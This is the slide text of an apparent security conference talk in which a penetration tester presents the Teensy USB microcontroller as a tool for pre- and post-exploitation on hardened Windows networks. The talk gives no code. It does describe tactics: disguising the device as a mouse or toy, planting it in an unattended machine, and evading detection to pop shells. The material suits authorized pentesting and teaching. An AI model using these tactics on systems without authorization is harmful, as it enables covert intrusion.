1. MERE PAAS TEENSY HAI
OR
COMPROMISING A HIGHLY SECURE
ENVIRONMENT PART 2
Nikhil Mittal (SamratAshok)
2. ABOUT ME
SamratAshok
Twitter - @nikhil_mitt
Penetration Tester with PwC India
I am interested in Offensive Information Security,
new attack vectors and methodologies to pwn
systems.
Creator of Kautilya and Maareech
Previous Talks
Ultimate Pen Testing: Compromising a highly secure
environment Clubhack’10
Here are your Keystrokes Hackfest’11
Upcoming Talks
Kautilya: Teensy beyond shell Blackhat Abu Dhabi’11
3. OVERVIEW
Why the Title?
Current State of Pentesting
Questions being raised to us
The answer to the questions
What’s done
What we will do
Limitations
Future
Conclusion
4. WHY THE TITLE?
What I Told to the ClubHack team:
I talked about compromising a highly secure
environment last year, let’s continue with the pwnage!!
Thanks to the team for buying that and allowing me to
speak.
The real reason:
5.
6. A TYPICAL PEN TEST SCENARIO
A client engagement comes with IP addresses.
We need to complete the assignment in very
restrictive time frame.
Pressure is on us to deliver a “good” report with
some high severity findings. (That “High” return
inside a red colored box)
8. This is a best case scenario.
Only lucky ones find that.
Generally legacy Enterprise Applications or
Business Critical applications are not upgraded.
There is almost no fun doing it that way.
9. SOME OF US DO IT BETTER
Enum Scan Exploit Report
10. SOME OF US DO IT EVEN BETTER
Enum
Post
+ Scan Exploit Report
Exp
Intel
11. WHY DO WE NEED TO EXPLOIT?
To gain access to the systems.
This shows the real threat to clients that we can
actually make an impact on their business. No more
“so-what”
We can create reports with “High” Severity findings.
<Audience>
<Audience>
12. WHAT DO WE EXPLOIT?
Memory Corruption bugs.
Server side
Client Side
Humans
Mis-configurations
Design Problems
<Audience>
<Audience>
13. QUESTIONS BEING RAISED TO US
Many times we get some vulnerabilities but can’t
exploit.
No public exploits available.
Not allowed on the system.
Countermeasure blocking it.
Exploit completed but no session was generated :P
Kya hai tumhare
paas?
14. QUESTIONS BEING RAISED TO US
Hardened Systems
Patches in place
Countermeasures blocking scans and exploits
Security incident monitoring and blocking
Kya hai tumhare
paas?
15. QUESTIONS BEING RAISED TO US
Just a bad day.
Exploit completed but no session was generated :P
Kya hai tumhare
paas?
16. ALTERNATIVES
Open file shares.
Sticky slips.
Social Engineering attacks.
Man In The Middle (many types)
SMB Relay
<Audience>
<Audience>
17. THE ANSWER TO THE QUESTIONS
TEENSY
A USB Micro-controller device.
We will use Teensy ++ which is a newer version of
Teensy.
Available for $24 from pjrc.com
Mere paas Teensy hai
18. USING TEENSY
Find an unattended system and insert the teensy
device in USB port.
Fool your victim by disguising it as a mouse, USB
toy, Thumb drive etc.
Generally Teensy needs just a minute to complete
the job.
You can program it according to your needs.
Undetected and unblocked, Teensy works great for
popping shells.
19. WHAT’S DONE
Arduino-Based attack vector in Social Engineering
Toolkit by David Kennedy
Contains some really awesome payloads.
Almost all payloads are for popping shells.
20. WHAT WE WILL DO
Teensy can be used for much more than popping
shells.
It can be used to perform pre and post exploitation.
We will have a detailed look at some of these
payloads and will understand how to create
payloads as per our needs.
21. DESCRIPTION OF PAYLOADS
More for Windows as desktops are generally based
on Windows.
Payloads vary from one line commands to powerful
scripts.
If you know powershell scripting, payloads will
make more sense and will be easier to customize.
31. BUT
What if even Teensy doesn’t work? With other
options not working already?
If USB ports are ripped off?
Would it be impossible to pwn such environment?
43. LIMITATIONS
Limited storage in Teensy. Resolved if you attach a
SD card with Teensy.
Inability to “read” from the system. You have to
assume the responses of victim OS and there is
only one way traffic.
44. FUTURE
Kautilya
Improvement in current payloads.
New payloads for non-traditional shells.
Dropping executables using additional storage
(already done).
45. CONCLUSION
If used wisely Teensy can be used as a complete
penetration testing device though with its own
limitations.
It’s a cheap device so use it.
Please use Kautilya and give feedback after it is
released.
Mere paas Teensy hai